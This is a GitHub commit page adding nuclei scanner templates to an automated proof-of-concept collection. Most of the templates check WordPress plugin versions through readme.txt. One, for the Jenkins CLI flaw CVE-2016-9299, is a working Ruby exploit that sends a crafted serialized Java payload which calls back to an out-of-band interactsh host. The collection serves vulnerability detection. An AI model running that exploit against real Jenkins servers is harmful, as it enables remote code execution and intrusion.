Skip to content

Commit

Permalink
20241031
Browse files Browse the repository at this point in the history
  • Loading branch information
actions-user committed Oct 31, 2024
1 parent 63b1127 commit 4fc5b88
Show file tree
Hide file tree
Showing 219 changed files with 13,085 additions and 1 deletion.
2 changes: 1 addition & 1 deletion date.txt
Original file line number Diff line number Diff line change
@@ -1 +1 @@
20241030
20241031
217 changes: 217 additions & 0 deletions poc.txt

Large diffs are not rendered by default.

Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: mycred-for-elementor-e30e983bb02401924b572068b6c5451f

info:
name: >
myCred Elementor <= 1.2.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
author: topscoder
severity: low
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/0fe2e1d6-7431-4121-93ad-cfe7837ac374?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/mycred-for-elementor/"
google-query: inurl:"/wp-content/plugins/mycred-for-elementor/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,mycred-for-elementor,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/mycred-for-elementor/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "mycred-for-elementor"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.2.6')
59 changes: 59 additions & 0 deletions poc/aws/CVE-2024-49634-2ec2de08e397d2077d08a4542cf24086.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: CVE-2024-49634-2ec2de08e397d2077d08a4542cf24086

info:
name: >
BP Member Type Manager <= 1.01 - Reflected Cross-Site Scripting
author: topscoder
severity: medium
description: >
The BP Member Type Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.01 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d167a483-7190-4285-a055-2280cc36f9c6?source=api-prod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-49634
metadata:
fofa-query: "wp-content/plugins/bp-member-type-manager/"
google-query: inurl:"/wp-content/plugins/bp-member-type-manager/"
shodan-query: 'vuln:CVE-2024-49634'
tags: cve,wordpress,wp-plugin,bp-member-type-manager,medium

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/bp-member-type-manager/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "bp-member-type-manager"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.01')
59 changes: 59 additions & 0 deletions poc/aws/surveyjs-cd16aaba63a1955d07ab2e32ec2b02e5.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: surveyjs-cd16aaba63a1955d07ab2e32ec2b02e5

info:
name: >
SurveyJS: Drag & Drop WordPress Form Builder <= 1.9.136 - Authenticated (Subscriber+) Arbitrary File Upload
author: topscoder
severity: low
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/07f6bf26-0b01-48be-bfe1-8213c5d5983f?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/surveyjs/"
google-query: inurl:"/wp-content/plugins/surveyjs/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,surveyjs,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/surveyjs/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "surveyjs"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.9.136')
123 changes: 123 additions & 0 deletions poc/cve/CVE-2016-9299.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,123 @@
id: CVE-2016-9299

info:
name: Jenkins CLI - HTTP Java Deserialization
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server.
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/jenkins_ldap_deserialize.rb
- https://nvd.nist.gov/vuln/detail/CVE-2016-9299
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2016-9299
cwe-id: CWE-90
cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:*
metadata:
max-request: 1
verified: true
vendor: jenkins
product: jenkins
shodan-query: product:"jenkins"
fofa-query: icon_hash=81586312
tags: cve,cve2016,rce,deserialization

variables:
oast: "{{interactsh-url}}"

code:
- engine:
- rb
- ruby # requires ruby to be pre-installed on system running nuclei

source: |
require 'socket'
require 'base64'
# Define environment variables for host details (make sure they are properly set in your environment)
$Hostname = ENV['Hostname']
$Host = ENV['Host']
$Port = ENV['Port']
interactsh = (ENV['oast']).ljust(45,'/')
url_dns = "aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff74002d657761776a7763737778766b6a66737763716c69316673737632357271306438642e6f6173742e6f6e6c696e6574000071007e0005740004687474707078740034687474703a2f2f657761776a7763737778766b6a66737763716c69316673737632357271306438642e6f6173742e6f6e6c696e6578"
$decoded_url_dns = [url_dns].pack("H*")
$decoded_url_dns = $decoded_url_dns.gsub! "ewawjwcswxvkjfswcqli1fssv25rq0d8d.oast.online", interactsh
# Step 1: Send the download request without waiting for a response or closing the socket
def send_download_request(host, port)
download_socket = TCPSocket.new(host, port)
download_request = <<~REQ
POST /cli HTTP/1.1
Host: #{$Hostname}
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e93
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0\r\n
REQ
#puts "Sending Download Request..."
download_socket.write(download_request)
# Return the open socket so we can read from it later
return download_socket
end
# Step 2: Send the upload request
def send_upload_request(host, port)
socket = TCPSocket.new(host, port)
# Base64 decoded payload for upload request
chunked_payload = "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=\x00\x00\x00\x00\x01\x55" + $decoded_url_dns
upload_request = <<~REQ
POST /cli HTTP/1.1
Host: #{$Hostname}
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e93
Side: upload
Content-Type: application/octet-stream
Content-Length: #{chunked_payload.bytesize}\r\n
REQ
#puts "Sending Upload Request..."
socket.write(upload_request)
# Send the binary data (payload)
socket.write(chunked_payload)
# Read and print the response for the upload request
response = socket.readpartial(1024)
#puts "Received from server (upload response): #{response}"
# Close the socket for upload request
socket.close
end
# Step 3: After upload request, read the download request's response
def read_download_response(socket)
#puts "Reading Download Request Response..."
response = socket.readpartial(1024)
socket.close
response
end
# Combined steps to perform the operations in the required order
# Step 1: Send download request (don't wait for response, keep the socket open)
download_socket = send_download_request($Host, $Port)
# Step 2: Send upload request
send_upload_request($Host, $Port)
# Print the download response
puts read_download_response(download_socket)
matchers:
- type: dsl
dsl:
- "contains(response,'hudson.remoting.UserRequest')"
- 'contains(interactsh_protocol, "dns")'
condition: and
# digest: 490a0046304402203cca921300c636eb8d986136c3b5dd567649cc0e956e016278f9e8e6d2e2f14602207e558f218d7293d1e2d1fa942bc313b240086e5f74545143c5553d3d044b4831:922c64590222798bb761d5b6d8e72950
59 changes: 59 additions & 0 deletions poc/cve/CVE-2023-46606-d2704f0b26ff9bb4048f99cda838a52f.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: CVE-2023-46606-d2704f0b26ff9bb4048f99cda838a52f

info:
name: >
AtomChat <= 1.1.4 - Missing Authorization via credits REST API Endpoint
author: topscoder
severity: high
description: >
The AtomChat plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'credits' REST API function in versions up to, and including, 1.1.4. This makes it possible for unauthenticated attackers to manipulate user credits when the myCred plugin is installed.
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/21f917a4-efee-421b-98b1-a9b18c7527d2?source=api-prod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
cve-id: CVE-2023-46606
metadata:
fofa-query: "wp-content/plugins/atomchat/"
google-query: inurl:"/wp-content/plugins/atomchat/"
shodan-query: 'vuln:CVE-2023-46606'
tags: cve,wordpress,wp-plugin,atomchat,high

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/atomchat/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "atomchat"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.1.4')
Loading

0 comments on commit 4fc5b88

Please sign in to comment.